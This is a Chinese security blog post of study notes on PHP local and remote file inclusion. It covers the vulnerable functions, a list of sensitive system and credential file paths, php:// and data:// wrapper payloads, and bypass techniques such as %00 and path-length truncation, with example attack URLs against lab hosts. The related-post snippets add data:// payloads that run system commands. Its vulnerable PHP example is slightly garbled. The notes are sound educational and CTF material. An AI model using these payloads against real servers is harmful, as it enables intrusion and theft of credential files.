web漏洞之文件包含

最新推荐文章于 2024-03-06 23:35:44 发布
最新推荐文章于 2024-03-06 23:35:44 发布
阅读量1k 收藏
点赞数
分类专栏: web漏洞 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Silence1111YL/article/details/120522070
版权

文件包含

  • Web应用实现了动态包含
  • 动态包含的文件路径参数,客户端可控

漏洞成因

相关函数

  • PHP

    include()         文件包含失败时,会产生警告,脚本会继续运行
include_once()include()功能相同,文件只会被包含一次
require()         文件包含失败时,会产生错误,直接结束脚本执行
require_once()require()功能相同,文件只会被包含一次
fopen()
readfile()

<?php
spath=$_GET['path '];
inc lude_once("/inc. php");
echo <h1>This is include_ once. php! </h1>;
include_once $path;

  • JSP/Servlet

    java.io.file( )
java.io.filereader( )

  • ASP

    include file
include virtual

漏洞分类

本地文件包含(LFI)

  • 本地文件包含就是可以读取和打开本地文件

    php.ini:
	allow_url_fopen=On/Off

远程文件包含(RFI)

  • 远程文件包含就是可以远程加载文件

    php.ini:
	allow_url_include=On/Off

漏洞危害

  • 目录遍历
  • 访问任意文件

漏洞挖掘

  • 代码审计
  • 查看url中是否有访问文件的参数

漏洞利用

常见的敏感信息路径

  • Windows系统

    c:\boot.ini // 查看系统版本
c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件
c:\windows\repair\sam // 存储Windows系统初次安装的密码
c:\Program Files\mysql\my.ini // MySQL配置
c:\Program Files\mysql\data\mysql\user.MYD // MySQL root密码
c:\windows\php.ini // php 配置信息

  • Linux/Unix系统

    /etc/passwd // 账户信息
/etc/shadow // 账户密码文件
/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置
/usr/local/app/php5/lib/php.ini // PHP相关配置
/etc/httpd/conf/httpd.conf // Apache配置文件
/etc/my.conf // mysql 配置文件

使用各种协议流

  • PHP

    http/https/file/ftp			
file://D://././readme.txt		allow_url_On/Off
php://filter/read=convert.base64-encode/resorce=./readme.txt		allow_url_On/Off
php://input[post data<?php phpinfo();?>]	allow_url_On
zip://D://file.zip%23readme.txt				allow_url_On/Off
data://test/plain.<?php phpinfo();?>		allow_url_On

  • ASP

    http/https/file/ftp/rtsp/smb

  • JAVA

    http/https/file/ftp/rtsp/smb

  • curl

    http/https/dict/file/ftp/imap/pop3/rtsp/smb/smtp/telnet

  • perl

    http/https/gopher/file/ftp/imap/pop3/rtsp/smb

配合文件上传漏洞

漏洞防御

  • 固定文件后缀,设置并检测访问文件的后缀

  • 固定文件,设置允许访问的文件

  • 防护软件

防御绕过

本地文件包含

  • %00截断

    利用条件:
	php版本<5.3.4
	magic_quotes_gpc=Off
利用:
	http://www.ctfs-wiki.com/FI/FI.php?filename=../../../../../../../boot.ini%00

  • 路径长度截断

    原理:
	Windows下目录最大长度为256字节,超出的部分会被丢弃
	Linux下目录最大长度为4096字节,超出的部分会被丢弃
利用:
http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

  • 点号截断

    原理:
	条件与路径长度截断相同
利用:
	http://192.168.159.128/include/include.php?filename=test.txt.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

远程文件包含

  • 问号绕过

    http://http://192.168.159.128/include/include.php?filename=http://192.168.91.133/readme.txt?

  • #号绕过

    http://192.168.159.128/include/include.php?filename=http://192.168.91.133/readme.txt%23

  • 空格绕过

    http://192.168.159.128/include/include.php?filename=http://192.168.91.133/readme.txt%20

红烧鸡腿儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web-文件包含
bingo_csdn的博客
10-29 2252
inclued:出错会继续执行 require:出错会退出 1、本地文件包含: 测试代码1.php如下所示: <?php //初始化.... define("ROOT",dirname(__FILE__).'/'); //加载模块 $mod = $_GET['mod']; echo ROOT.$mod.'.php'; include(ROOT.$mod.'.php'); ?> 我们在同目录下2.php写入如下代码: <?php phpinfo();?> 请求/1.php?mod=2即
Web安全-文件包含
sixoneyvye的博客
04-17 428
一、了解文件包含 了解文件包含 什么是文件包含:为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件漏洞成因:文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 PHP引发文件包含的四个函数 include() ...
web文件包含
YkingH的博客
10-07 1340
文件包含 文件包含漏洞原理 文件包含:程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用过程,称为文件包含文件包含漏洞:为使代码更加灵活,会将包含文件设置为变量,用来进行动态调用,漏洞产生的原因正是函数通过变量引入文件时,没有对传入的文件名进行合理的校验,从而操作了意想之外的文件,导致文件泄露甚至恶意代码注入。 PHP: include(), include_once(), require(), require_once(), fopen(),
web漏洞文件包含
最新发布
2301_79688134的博客
03-06 801
文件包含是一个功能,在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另一个代码文件,比如在PHP中提供了include(),include_once(),require,require_once (),这些文件包含函数在代码设计中经常被使用到。
ctfshow-web文件包含(web78-88,116-117)(Updating)
m0_50268414的博客
11-30 4422
ctfshow-web文件包含(web78-88) 文章目录ctfshow-web文件包含(web78-88)web78 php://filterweb79 data://web80 nginx日志文件+cookie处执行命令web82-86 session 学习了大佬的总结文章:文件包含总结 开始做题 web78 php://filter [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rPvT4HZP-1638275278437)(1wPFzslh6Rk8e34s00DQZ
Web应用安全:文件包含漏洞简介.pptx
06-18
大多数Web语言都支持文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,也就导致文件包含漏洞经常出现在PHP语言中。这里就以PHP语言为例。 PHP中提供了四个文件包含的函数: include( ) 当使用该函数...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web网站文件包含漏洞和攻击-运维安全详细笔记总结
第七式 七伤拳 web安全之文件包含漏洞专题.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全之文件包含漏洞专题
web-渗透-文件上传漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
渗透测试技术之本地文件包含
02-01
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
WEB安全-文件包含
qq_59350385的博客
03-01 3099
一、文件包含的定义 如果说使用文件包含的路径是攻击者可控的话,此时,我们可以通过控制参数变量从而能包含本不在开发者意愿之内的文件。 本地文件包含包含服务器端的文件 远程文件包含包含远程url的文件 (allow_url_fopen allow_url_include) 可以用什么去截断:? #(%23) 二、文件包含的利用 1.配合文件上传漏洞执行getshell 2.包含日志getshell ...
WEB漏洞文件包含漏洞
holen_的博客
01-25 2537
介绍 所谓文件包含漏洞,故名思意,就是在文件包含(引用)了其他文件所导致的漏洞。例如有些函数在不同代码中的作用都是相同的,在这里我们可以称呼它为“变量”,那么这时程序员就会将该“变量”放在一个文件中,在其他代码中引用该变量文件即可。 当这种灵活性通过动态变量的方式引入需要包含文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。 脚本利用 我们先创建一个带有文件包含脚本的PHP文件放在服务器上,代码如下 <?php $filename=$_GET['file
Web的基本漏洞--文件包含漏洞
尽欢的博客
05-31 1349
文件包含漏洞介绍
web安全入门(第九章-3)文件包含
Yzz_的博客
06-07 238
一、什么是文件包含漏洞 0,场景 后端的每个页面都要进行身份验证。假若普通人可以访问管理员才能看到的页面 不就造成了越权吗。但是如果每个页面都写一遍验证身份的代码。整个系统会变得 很冗余且难维护。 为此,开发们写了一些文件包含函数。这样验证代码仅仅写在一个文件中, 什么地方用到就调用这个文件,即文件包含 初衷:~减少代码冗余 ~方便修改 1,定义 攻击者利用包含的特性,加上应用本身对包含文件的控制不严格, 导致系统执行了攻击者的恶意文件。 本质上,文
Web漏洞_文件包含(原理、分类、利用)
BeatRex的博客
12-01 1666
一、原理 编程语言中设计了可以在某个代码中包含其他已经写好或者可以供其他代码调用的文件,如调用一些定义好的类或者函数。而正式因为可以包含其他文件从而有可能会产生文件包含漏洞。 大多数Web语言都可以使用文件包含操作,由于PHP语言的文件包含功能强大因此也容易出现文件包含漏洞。况且目前大部分网站由PHP开发,所以着重先研究PHP文件包含漏洞。 二、分类 2.1本地文件包含 Local File ...
【CTF WEB文件包含
weixin_30949361的博客
09-29 541
文件包含 题目要求: 请找到题目中FLAG 漏洞源码 <meta charset='utf-8'> <center><h1>文件阅读器</h1></center> <!-- 据说flag在flag.php里 --> <?php error_reporting(0); $f=$_GET['file']; if(s...
CTFshow-WEB入门-文件包含(持续更新)
feng的博客
01-23 1450
web78 ?file=data://text/plain,<?php system("cat flag.php");?> 或者伪协议读也行。 web79 ?file=data://text/plain,<?= system("cat flag*");?> 或者 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg== 其中data://可以换成data: web80 方法一:远程文件
web安全--文件包含(本地包含,远程包含
nareku的博客
04-05 4221
前言 文件包含漏洞简介: 文件包含的函数的参数没有经过过滤或者是严格的定义,并且参数可以被用户所控制,这样就可能包含非预期的文件。 一.文件包含漏洞常见的函数(默认都以php脚本为准啊) ①include: 包含并运行指定的文件,Include在出错的时候产生警告,脚本会继续运行 ②include_once:在脚本执行期间包含并运行指定文件。该函数和include 函数类似,两者唯一的区别是 使用该函数的时候,php会加检查指定文件是否已经被包含过,如果是,则不会再被包含。 ③require :
Web安全漏洞包括文件包含漏洞吗?
05-13
是的,文件包含漏洞Web安全漏洞的一种类型。文件包含漏洞通常发生在Web应用程序中,当应用程序使用用户提供的数据(如文件名或路径)来加载或执行文件时,攻击者可以通过构造恶意输入来实现远程代码执行或敏感信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值